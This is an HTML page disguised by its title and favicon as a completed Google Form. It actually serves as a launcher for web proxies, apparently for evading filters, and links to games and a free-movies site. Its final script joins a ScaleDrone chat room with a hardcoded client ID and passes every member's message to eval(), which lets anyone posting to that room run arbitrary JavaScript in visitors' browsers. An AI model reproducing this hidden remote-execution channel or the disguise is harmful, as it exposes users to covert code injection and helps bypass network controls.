<head>
  <link rel="icon" type="image/jpg" href="https://ssl.gstatic.com/docs/spreadsheets/forms/favicon_qp2.png"/>
  <title>You've already responded</title>
  <script src='https://cdn.scaledrone.com/scaledrone.min.js' type='text/javascript'></script>
  <!--<script type='text/javascript' src='http://0.0.0.0:8080/scaledrone.js'></script>-->
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@500&display=swap" rel="stylesheet">
</head>
<body>
 <header>
  <nav>
   <ul class="nav_links"> 
     <div class="dropdown">
      <button class="dropbtn">Proxy</button>
     <div class="dropdown-content">
    <a onclick="document.getElementById('iframe').src ='https://yuqp82736.herokuapp.com'">Proxy v2.0</a>
    <a onclick="document.getElementById('iframe').src ='https://kajh34.herokuapp.com/'">Proxy v1.0</a>
     </div>
     </div>
     <div class="dropdown">
      <button class="dropbtn">Google</button>
     <div class="dropdown-content">
    <a onclick="document.getElementById('iframe').src ='https://yuqp82736.herokuapp.com/web/_aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==_/'">Google v2.0</a>
    <a onclick="document.getElementById('iframe').src ='https://owq93.herokuapp.com/corrosion/hvtrs8%2F-wuw%2Cgmoelg.aoo%2F/'">Google BETA</a>
     </div>
     </div>
   <li><a onclick="document.getElementById('iframe').src = 'https://yuqp82736.herokuapp.com/web/_aHR0cHM6Ly9pbnZpZGlvdXMuc25vcHl0YS5vcmc=_/feed/popular'">Youtube</a></li>
    <div class="dropdown">
      <button class="dropbtn">io Games</button>
     <div class="dropdown-content"> 
    <a onclick="document.getElementById('iframe').src ='https://yuqp82736.herokuapp.com/web/_aHR0cHM6Ly9pb2dhbWVzLm9ubA==_/lolbeansio.embed'">LOLBeans</a>
    <a onclick="document.getElementById('iframe').src ='https://yuqp82736.herokuapp.com/web/_aHR0cHM6Ly9pb2dhbWVzLm9ubA==_/shell-shockers.embed'">Shell Shockers</a>
    <a onclick="document.getElementById('iframe').src ='https://yuqp82736.herokuapp.com/web/_aHR0cHM6Ly9pb2dhbWVzLm9ubA==_/skribbl-io-games.embed'">Skribbl</a>
    <a onclick="document.getElementById('iframe').src ='https://yuqp82736.herokuapp.com/web/_aHR0cHM6Ly9pb2dhbWVzLm9ubA==_/surviv-io.embed'">Surviv</a>
    <a onclick="document.getElementById('iframe').src ='https://warbot.io/'">Warbot</a>
   <a onclick="document.getElementById('iframe').src ='https://splix.io/'">Splix</a>
       <a onclick="document.getElementById('iframe').src = 'https://worldle.teuteuf.fr/'">Worldle</a>
     </div>
     </div>
    <li><a onclick="document.getElementById('iframe').src = 'https://kajh34.herokuapp.com/prefix/aHR0cHM6Ly9sb29rbW92aWUuaW8=/'">Free Movies</a></li>
   </ul>
  </nav>
    <a class="cta"><button onclick="fullScreenRequest('iframe')">Fullscreen</button></a>
 </header>  
    <iframe id="iframe" style="border: 0px;" width="100%" height="100%" src="" sandbox="allow-same-origin allow-forms allow-modals allow-orientation-lock allow-pointer-lock allow-popups allow-popups-to-escape-sandbox allow-presentation allow-scripts"></iframe>
<style>
      * {
      box-sizing: border-box;
      margin: 0;
      padding: 0;
      background-color: #24252A;
      }
      
      li, a, button {
      font-family: "Montserrat", sans-serif;
      font-weight: 500;
      font-size: 16px;
      color: #edf0f1;
      text-decoration: none;
      cursor: pointer;
      }
      
      header {
      display: flex;
      justify-content: space-between;
      allign-items: center;
      padding: 10px 5%;
      }
      
      .nav_links {
      list-style: none;
      }
      
      .nav_links li {
      display: inline-block;
      padding: 9px 20px
      }
      
      .nav_links li a {
      transition: all 0.3s ease 0s;
      }
      
      .nav_links li a:hover {
      color: #0088a9
      }
      
      button {
      padding: 9px 25px;
      background-color: rgba(0,136,168,1);
      border: none;
      border-radius: 50px;
      cursor: pointer;
      transition: all 0.3s ease 0s;
      }
      button:hover {
      background-color: rgba(0,136,168,0.8);
      }
      
     .dropbtn {
      background-color: rgba(1,2,1,0);
      color: #edf0f1;
      font-size: 16px;
      border: none;
      }

     .dropdown {
      position: relative;
      display: inline-block;
      }

     .dropdown-content {
      display: none;
      position: absolute;
      background-color: #f1f1f1;
      min-width: 160px;
      box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2);
      z-index: 1;
      }

     .dropdown-content a {
      color: #edf0f1;
      padding: 12px 16px;
      text-decoration: none;
      display: block;
      font-family: "Montserrat", sans-serif;
      }

     .dropdown-content a:hover {
      background-color: rgba(0,0,0,0.8);
      }

     .dropdown:hover .dropdown-content {
      display: block;
      }

     .dropdown:hover .dropbtn {
      color: #0088a9; background-color: rgba(0,0,0,0)
      }
</style>
<script>
function fullScreenRequest(id) {
  if (document.getElementById(id).requestFullscreen) {
    document.getElementById(id).requestFullscreen();
} else if (document.getElementById(id).mozRequestFullScreen) {
    document.getElementById(id).mozRequestFullScreen();
} else if (document.getElementById(id).webkitRequestFullscreen) {
document.getElementById(id).webkitRequestFullscreen();
} else if (document.getElementById(id).msRequestFullscreen) {
document.getElementById(id).msRequestFullscreen();
 }
}

function closeFullscreen() {
  if (document.exitFullscreen) {
   document.exitFullscreen();
} else if (document.webkitExitFullscreen) {
   document.webkitExitFullscreen();
} else if (document.msExitFullscreen) {
   document.msExitFullscreen();
 }
}  
</script>
  <script>
  const CLIENT_ID = 'Wa9787NIBwG7ckyH';

const drone = new ScaleDrone(CLIENT_ID, {
  data: { // Will be sent out as clientData via events
    name: getRandomName(),
    color: '#00FF00',
  },
});

let members = [];

drone.on('open', error => {
  if (error) {
    return console.error(error);
  }
  console.log('Successfully connected to Scaledrone');

  const room = drone.subscribe('observable-room');
  room.on('open', error => {
    if (error) {
      return console.error(error);
    }
    console.log('Successfully joined room');
  });

  room.on('members', m => {
    members = m;
    updateMembersDOM();
  });

  room.on('member_join', member => {
    members.push(member);
    updateMembersDOM();
  });

  room.on('member_leave', ({id}) => {
    const index = members.findIndex(member => member.id === id);
    members.splice(index, 1);
    updateMembersDOM();
  });

  room.on('data', (text, member) => {
    if (member) {
     eval(text)
    } else {
      // Message is from server
    }
  });
});

drone.on('close', event => {
  console.log('Connection was closed', event);
});

drone.on('error', error => {
  console.error(error);
});

function getRandomName() {
  const adjs = ["2-js"];
  const nouns = ["user"];
  return (
    adjs[Math.floor(Math.random() * adjs.length)] +
    "_" +
    nouns[Math.floor(Math.random() * nouns.length)]
  );
}

function getRandomColor() {
  return '#' + Math.floor(Math.random() * 0xFFFFFF).toString(16);
}

//------------- DOM STUFF

const DOM = {
  membersCount: document.querySelector('.members-count'),
  membersList: document.querySelector('.members-list'),
  messages: document.querySelector('.messages'),
  input: document.querySelector('.message-form__input'),
  form: document.querySelector('.message-form'),
};

DOM.form.addEventListener('submit', sendMessage);

function sendMessage() {
  const value = DOM.input.value;
  if (value === '') {
    return;
  }
  DOM.input.value = '';
  drone.publish({
    room: 'observable-room',
    message: value,
  });
}

function createMemberElement(member) {
  const { name, color } = member.clientData;
  const el = document.createElement('div');
  el.appendChild(document.createTextNode(name));
  el.className = 'member';
  el.style.color = color;
  return el;
}

function updateMembersDOM() {
  DOM.membersCount.innerText = `${members.length} users in room:`;
  DOM.membersList.innerHTML = '';
  members.forEach(member =>
    DOM.membersList.appendChild(createMemberElement(member))
  );
}

function createMessageElement(text, member) {
  const el = document.createElement('div');
  el.appendChild(createMemberElement(member));
  el.appendChild(document.createTextNode(text));
  el.className = 'message';
  return el;
}

function addMessageToListDOM(text, member) {
  const el = DOM.messages;
  const wasTop = el.scrollTop === el.scrollHeight - el.clientHeight;
  el.appendChild(createMessageElement(text, member));
  if (wasTop) {
    el.scrollTop = el.scrollHeight - el.clientHeight;
  }
}
  </script>
</body>
